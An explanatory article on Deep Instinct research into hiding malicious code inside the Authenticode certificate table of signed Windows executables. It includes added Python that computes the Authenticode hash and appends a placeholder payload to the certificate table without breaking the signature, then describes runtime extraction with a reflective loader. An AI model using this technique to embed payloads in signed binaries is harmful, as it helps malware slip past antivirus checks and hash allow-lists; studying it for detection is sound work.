When a user double-clicks a signed executable, Windows does three things before it trusts the signature: it parses the file’s PE headers, validates the signing certificate and its chain, and recomputes the Authenticode hash of the file so it can compare it against the hash embedded in the signature.

After reverse-engineering this entire process, the Deep Instinct team found that three parts of a PE file are excluded from the hash calculation, so modifying them changes neither the computed hash nor the validity of the certificate.

The three are the CheckSum field in the optional header, the IMAGE_DIRECTORY_ENTRY_SECURITY entry in the DataDirectory (which records the file offset and size of the certificate table), and the attribute certificate table itself.

In proof-of-concept code, the research team placed malicious code inside the attribute certificate table, leaving both the digital signature and the signed file hash intact.
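The following is an added example, not Deep Instinct’s code, that shows why those three regions are free real estate. It implements the Authenticode hashing rules (headers minus CheckSum and the security directory entry, then the sections, then any trailing data minus the certificate table), builds a constructed minimal PE32 with a placeholder WIN_CERTIFICATE, and then performs the three edits the article describes: rewriting CheckSum, growing the certificate table to hold a payload, and updating the directory entry to match. The PE builder, the placeholder certificate blob, and the `0x90 ... 0xC3` payload bytes are all assumptions made for the demonstration; a byte flipped inside the `.text` section is included to show that the hash does still cover the code sections.

```python
"""Authenticode hashing of a PE image and the bytes it leaves uncovered.
Added example, not Deep Instinct's code. Uses only the standard library."""
import hashlib
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4
_DATADIR_OFF = {0x10B: 96, 0x20B: 112}  # DataDirectory offset in PE32 / PE32+ optional header


def pe_layout(data):
    """Locate what Authenticode skips: CheckSum, the security directory entry and the cert table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    nt = struct.unpack_from("<I", data, 0x3C)[0]
    if data[nt:nt + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = nt + 4                                             # IMAGE_FILE_HEADER
    nsec = struct.unpack_from("<H", data, fh + 2)[0]
    opt_size = struct.unpack_from("<H", data, fh + 16)[0]
    opt = fh + 20                                           # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    secdir = opt + _DATADIR_OFF[magic] + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    sh = opt + opt_size                                     # first IMAGE_SECTION_HEADER
    # (SizeOfRawData, PointerToRawData) live at +16 in each 40-byte section header
    sections = [struct.unpack_from("<II", data, sh + 40 * i + 16)[::-1] for i in range(nsec)]
    return {
        "checksum": opt + 64,
        "size_of_headers": struct.unpack_from("<I", data, opt + 60)[0],
        "secdir": secdir,
        "cert": struct.unpack_from("<II", data, secdir),    # (file offset, size)
        "sections": sorted(sections),                       # (PointerToRawData, SizeOfRawData)
    }


def authenticode_hash(data, algo="sha256"):
    """Hash exactly the bytes the signature covers; the three excluded regions are skipped."""
    lay = pe_layout(data)
    h = hashlib.new(algo)
    h.update(data[:lay["checksum"]])                         # headers up to CheckSum
    h.update(data[lay["checksum"] + 4:lay["secdir"]])        # ... skipping CheckSum (4 bytes)
    h.update(data[lay["secdir"] + 8:lay["size_of_headers"]]) # ... skipping the security entry (8 bytes)
    hashed = lay["size_of_headers"]
    for ptr, size in lay["sections"]:                        # raw section data, in file order
        h.update(data[ptr:ptr + size])
        hashed = max(hashed, ptr + size)
    cert_off, cert_size = lay["cert"]
    if cert_size == 0:
        h.update(data[hashed:])                              # unsigned: hash any overlay as-is
    else:
        if cert_off < hashed:
            raise ValueError("certificate table overlaps hashed data")
        h.update(data[hashed:cert_off])                      # overlay before the table
        h.update(data[cert_off + cert_size:])                # the spec expects nothing after it
    return h.hexdigest()


def win_certificate(pkcs7):
    """WIN_CERTIFICATE header (dwLength, wRevision 0x0200, PKCS_SIGNED_DATA) plus 8-aligned body."""
    body = pkcs7.ljust((len(pkcs7) + 7) // 8 * 8, b"\0")
    return struct.pack("<IHH", 8 + len(body), 0x0200, 0x0002) + body


def build_min_pe(code, cert_table=b""):
    """Constructed PE32 with one .text section and an optional appended certificate table."""
    align, hdr_size = 0x200, 0x200
    raw = (len(code) + align - 1) // align * align
    cert_off = hdr_size + raw if cert_table else 0
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                              # PE32 magic
    struct.pack_into("<II", opt, 32, 0x1000, align)                    # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x2000, hdr_size)                 # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 3)                                 # Subsystem: console
    struct.pack_into("<I", opt, 92, 16)                                # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, cert_off, len(cert_table))
    fh = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x0102)  # i386, 1 section, EXECUTABLE|32BIT
    sec = b".text\0\0\0" + struct.pack("<IIIIIIHHI", len(code), 0x1000, raw, hdr_size, 0, 0, 0, 0, 0x60000020)
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    headers = (dos + b"PE\0\0" + fh + bytes(opt) + sec).ljust(hdr_size, b"\0")
    return headers + code.ljust(raw, b"\0") + cert_table


def set_checksum(pe, value):
    """Rewrite OptionalHeader.CheckSum, the first excluded field."""
    out = bytearray(pe)
    struct.pack_into("<I", out, pe_layout(pe)["checksum"], value)
    return bytes(out)


def hide_in_cert_table(pe, payload):
    """Append a payload to the attribute certificate table and grow both the security
    directory entry and WIN_CERTIFICATE.dwLength to cover it (assumes one entry at EOF)."""
    lay = pe_layout(pe)
    cert_off, cert_size = lay["cert"]
    if cert_size == 0 or cert_off + cert_size != len(pe):
        raise ValueError("expects a single certificate table at end of file")
    blob = payload.ljust((len(payload) + 7) // 8 * 8, b"\0")
    out = bytearray(pe) + blob
    struct.pack_into("<I", out, cert_off, cert_size + len(blob))             # dwLength
    struct.pack_into("<II", out, lay["secdir"], cert_off, cert_size + len(blob))
    return bytes(out)


def cert_table(pe):
    """Read the attribute certificate table back out, which is where a loader would start."""
    off, size = pe_layout(pe)["cert"]
    return pe[off:off + size]
```

Run `authenticode_hash` on the original and on the tampered copies: the CheckSum rewrite and the grown certificate table (with its updated directory entry) produce the same digest, while a single flipped byte inside `.text` does not. The check you want in production is the converse: a scanner that trusts a signature should still examine the certificate table for anything that is not a well-formed PKCS#7 blob.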

This method is so effective that malware authors do not even need to obfuscate their malicious code. The reason is that many antivirus and security products treat a validly signed file as trusted and scan it less aggressively, or skip it altogether.

Because the file hash is left intact, the technique also defeats secondary checks that security software might perform beyond verifying the digital signature, such as hash-based reputation lookups or allow-lists.

The researchers also solved a practical obstacle: the attribute certificate table sits outside every section of the file, so Windows does not map it into memory when it loads the image, and code placed there cannot simply be jumped to. Their proof of concept instead reads the payload out of the certificate table at runtime and executes it with a reflective PE loader.

Despite their success, the Deep Instinct team said their Reflective PE Loader does not support 64-bit architectures, at least for now.

For malware authors this approach provides a way to hide malicious code in plain sight, inside the digital signature itself, the very part of the file that is meant to authenticate its origin and protect users from malware.